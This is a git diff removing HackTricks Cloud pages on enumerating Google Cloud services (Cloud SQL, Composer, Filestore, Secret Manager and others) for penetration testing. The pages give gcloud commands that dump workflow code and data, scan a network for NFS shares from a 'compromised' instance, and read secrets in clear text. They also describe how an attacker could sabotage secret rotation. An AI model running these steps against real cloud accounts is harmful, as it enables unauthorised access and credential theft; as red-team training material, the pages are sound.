-Moreover, its offered at **no additional cost.**
-
-**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization.
-
-There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**.
-
-Note that Cloud Shell can be **easily disabled** for the organization.
-
-### Post Exploitation
-
-{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %}
-[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %}
-[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
deleted file mode 100644
index ee69ced5a..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
+++ /dev/null
@@ -1,115 +0,0 @@
-# GCP - Cloud SQL Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups.
-
-Key features of Google Cloud SQL include:
-
-1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration.
-2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime.
-3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures.
-4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC.
-5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data.
-6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications.
-7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance.
-
-### Password
-
-In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
-
-
-
-It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
-
-**SQL Server** can be configured with **Active Directory Authentication**.
-
-### Zone Availability
-
-The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones.
-
-### Encryption
-
-By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**.
-
-### Connections
-
-* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network
-* **Public IP**: The database will get a public IP, but by default no-one will be able to connect
- * **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
-* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
-
-
- -### Data Protection - -* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain. -* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second. -* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled - -### Enumeration - -```bash -# Get SQL instances -gcloud sql instances list -gcloud sql instances describe # get IPs, CACert, settings - -# Get database names inside an instance (like information_schema, sys...) -gcloud sql databases list --instance -gcloud sql databases describe --instance - -# Get usernames inside the db instance -gcloud sql users list --instance - -# Backups -gcloud sql backups list --instance -gcloud sql backups describe --instance -``` - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %} -[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %} -[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
deleted file mode 100644
index f238feb32..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# GCP - Composer Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get envs info -gcloud composer environments list --locations -gcloud composer environments describe --location - -# Get list of dags -gcloud composer environments storage dags list --environment --location -# Download dags code -mkdir /tmp/dags -gcloud composer environments storage dags export --environment --location --destination /tmp/dags - -# List Data from composer -gcloud composer environments storage data list --environment --location -# Download data -mkdir /tmp/data -gcloud composer environments storage data export --environment --location --destination /tmp/data - -# List Plugins from composer -gcloud composer environments storage plugins list --environment --location -# Download plugins -mkdir /tmp/plugins -gcloud composer environments storage data export --environment --location --destination /tmp/plugins -``` -{% endcode %} - -### Privesc - -In the following page you can check how to **abuse composer permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %} -[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice 
GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
deleted file mode 100644
index 136c2dcce..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# GCP - DNS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## GCP - Cloud DNS
-
-Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service.
-
-```bash
-# This will usually error if DNS service isn't configured in the project
-gcloud dns project-info describe
-
-# Get DNS zones & records
-gcloud dns managed-zones list
-gcloud dns managed-zones describe
-gcloud dns record-sets list --zone # Get record of the zone
-
-# Policies
-## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks.
-gcloud dns response-policies list
-## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to.
-gcloud dns policies list
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
deleted file mode 100644
index d60c12b00..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
+++ /dev/null
@@ -1,105 +0,0 @@
-# GCP - Filestore Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases. - -You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info. - -### Connections - -When creating a Filestore instance it's possible to **select the network where it's going to be accessible**. - -Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.** - -It can also be accessible via a **Private Service Access Connection:** - -* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL. -* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**. -* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision. -* The VPC peering will import new routes to your VPC - -### Backups - -It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**. 
- -### Encryption - -By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**. - -### Enumeration - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. - -{% code overflow="wrap" %} -```bash -# Instances -gcloud filestore instances list # Check the IP address -gcloud filestore instances describe --zone # Check IP and access restrictions - -# Backups -gcloud filestore backups list -gcloud filestore backups describe --region - -# Search for NFS shares in a VPC subnet -sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20 -``` -{% endcode %} - -{% hint style="danger" %} -Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\ -So you might need to **enumerate VPC peers** to also run nmap over those network ranges. 
- -{% code overflow="wrap" %} -```bash -# Get peerings -gcloud compute networks peerings list -# Get routes imported from a peering -gcloud compute networks peerings list-routes --network= --region= --direction=INCOMING -``` -{% endcode %} -{% endhint %} - -### Privilege Escalation & Post Exploitation - -There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges: - -{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %} -[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
deleted file mode 100644
index 4eb8b93c3..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# GCP - Firestore Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
-
-Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
-
-```bash
-gcloud firestore indexes composite list
-gcloud firestore indexes composite describe
-gcloud firestore indexes fields list
-gcloud firestore indexes fields describe
-gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
deleted file mode 100644
index 169225779..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Memorystore Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Memorystore
-
-Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
-
-```bash
-# Memcache
-gcloud memcache instances list --region
-gcloud memcache instances describe --region
-# You should try to connect to the memcache instances to access the data
-
-# Redis
-gcloud redis instances list --region
-gcloud redis instances describe --region
-gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
deleted file mode 100644
index d19210668..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# GCP - Monitoring Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
-
-### Policies
-
-Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
-
-### Dashboards
-
-Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
-
-### Channels
-
-Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
-
-Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
-
-### Snoozers
-
-A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
-
-### Enumeration
-
-{% code overflow="wrap" %}
-```bash
-# Get policies
-gcloud alpha monitoring policies list
-gcloud alpha monitoring policies describe
-
-# Get dashboards
-gcloud monitoring dashboards list
-gcloud monitoring dashboards describe
-
-# Get snoozers
-gcloud monitoring snoozes list
-gcloud monitoring snoozes describe
-
-# Get Channels
-gcloud alpha monitoring channels list
-gcloud alpha monitoring channels describe
-```
-{% endcode %}
-
-### Post Exploitation
-
-{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %}
-[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md)
-{% endcontent-ref %}
-
-## References
-
-* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
deleted file mode 100644
index 87ea24f72..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# GCP - Secrets Manager Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Secret Manager - -Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data. - -A secret can have **different versions storing different data**. - -Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret. - -Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**. - -It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**. - -### Enumeration - -```bash -# First, list the entries -gcloud secrets list -gcloud secrets get-iam-policy - -# Then, pull the clear-text of any version of any secret -gcloud secrets versions list -gcloud secrets versions access 1 --secret="" -``` - -### Privilege Escalation - -In the following page you can check how to **abuse secretmanager permissions to escalate privileges.** - -{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %} -[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) 
or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
deleted file mode 100644
index 764278cea..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
+++ /dev/null
@@ -1,95 +0,0 @@
-# GCP - Source Repositories Enum
-
-{% hint style="success" %}
